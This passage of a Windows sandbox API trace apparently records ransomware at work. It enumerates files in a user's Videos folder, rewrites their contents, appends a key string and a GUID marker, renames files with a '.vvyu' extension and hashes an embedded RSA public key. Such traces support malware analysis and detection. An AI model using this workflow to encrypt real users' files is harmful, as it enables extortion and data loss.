Size=0x100) returned 0x2be2220 [0197.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4be50 [0197.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.742] GetCurrentThreadId () returned 0x264 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a468 [0197.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4c8 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4e0 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a480 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a450 [0197.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0197.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0197.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d3e8 | out: hHeap=0x6a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.753] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x12fd7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x12fd7, lpOverlapped=0x0) returned 1 [0197.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.755] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x12fdc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.755] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.757] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.757] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.757] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.757] CloseHandle (hObject=0x52c) returned 1 [0197.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0197.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0197.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0197.760] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\b5aBDkyBYyj.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\b5abdkybyyj.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\b5aBDkyBYyj.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\b5abdkybyyj.swf.vvyu")) returned 1 [0197.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.762] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0197.765] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74b5e40, ftCreationTime.dwHighDateTime=0x1d89cf2, ftLastAccessTime.dwLowDateTime=0x74d915a0, ftLastAccessTime.dwHighDateTime=0x1d8a545, ftLastWriteTime.dwLowDateTime=0x74d915a0, ftLastWriteTime.dwHighDateTime=0x1d8a545, nFileSizeHigh=0x0, nFileSizeLow=0x7970, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDTDz9.mp4", cAlternateFileName="")) returned 1 [0197.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0197.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.766] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\EDTDz9.mp4") returned=".mp4" [0197.766] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\EDTDz9.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\edtdz9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.766] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=31088) returned 1 [0197.766] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.769] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x794a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.769] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.772] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.772] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7970, lpOverlapped=0x0) returned 1 [0197.773] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.773] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.773] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.773] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0197.774] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.774] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.774] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.774] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.774] GetLastError () returned 0x0 [0197.774] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.774] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0197.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.775] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.775] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.775] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7970) returned 0x2d4f778 [0197.775] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d3e8 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d430 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.776] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.777] HeapFree (in: hHeap=0x6a0000, 